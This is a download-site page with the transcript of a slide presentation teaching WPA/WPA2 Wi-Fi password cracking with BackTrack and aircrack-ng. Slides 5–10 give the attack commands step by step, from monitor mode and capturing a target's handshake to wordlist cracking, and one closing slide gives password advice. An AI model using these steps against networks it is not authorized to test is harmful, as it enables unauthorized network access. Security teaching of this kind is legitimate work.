1 / 12

Wireless Hacking, Cracking WPA/WPA2

By: Dennis Maldonado. Wireless Hacking, Cracking WPA/WPA2. Tools. BackTrack Linux 5 R2 – Our attacker machine Aircrack-ng suite – Suite of tools used to recover wireless encryptions keys and carry all sorts of attacks against wireless networks . Notes.

lidia
Download Presentation

Wireless Hacking, Cracking WPA/WPA2

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. By: Dennis Maldonado Wireless Hacking,Cracking WPA/WPA2

  2. Tools • BackTrack Linux 5 R2 – Our attacker machine • Aircrack-ng suite –Suite of tools used to recover wireless encryptions keys and carry all sorts of attacks against wireless networks.

  3. Notes • AP = Access Point = Wireless Router • Start backtrack GUI with “startx” • Click the second icon on the bottom left of backtrack to start a terminal.

  4. How this works. • When clients connect to a WPA/WPA2 encrypted network, they have a 4-way handshake with the router. • We need this 4-way handshake to recover the password. • We can crack the password offline once we get the handshake • Attack is completely passive on the router.

  5. Start wireless card in monitor mode airmon-ng start wlan0 • Tool used for putting your card into monitor mode • wlan0 = Wireless interface. You can find your wireless interface by typing “iwconfig” You should see “monitor mode enabled on mon0” somewhere.

  6. Finding a vulnerable AP airodump-ng mon0 • Tool used to listen to wireless routers in the area • Look for any wireless networks that say WPA2 • Remember their BSSID and Channel

  7. Capture packets from the victim AP airodump-ng–-bssid00:13:10:73:FC:C5 –c 6 –w dump mon0 • --bssidis the mac address of the router • -c is the channel of the router • -w is where to save the dump file • dump is the file name Keep that running in it’s own terminal until a client connects

  8. Capturing the WPA Handshake • Wait until a client connects • Alternatively, force a connected client to disconnect, making them reconnect and capturing their handshake. • Will go into detail on that later…

  9. How to know when you get the handshake • In airodump-ng, look in the top left. • You should see “WPA handshake <bssid>” • If you do, dance. • Now you are ready to crack. • Stop airodump-ng by pressing Control + c

  10. Cracking the captured handshake • aircrack-ng will crack the password. We specify the bssid, the dump file, and a wordlist to guess the password with. • Wordlist = /pentest/database/sqlmap/txt/wordlist.txt • aircrack-ng –w <list> –b 00:13:10:73:FC:C5 dump*.cap • Aircrack-ng –w /pentest/databas

  11. Password Recovered!

  12. How to protect yourself • Choose WPA2 • WPA2 can have up to 63 characters. Use them! • Use Numbers, lower-upper case, special characters

More Related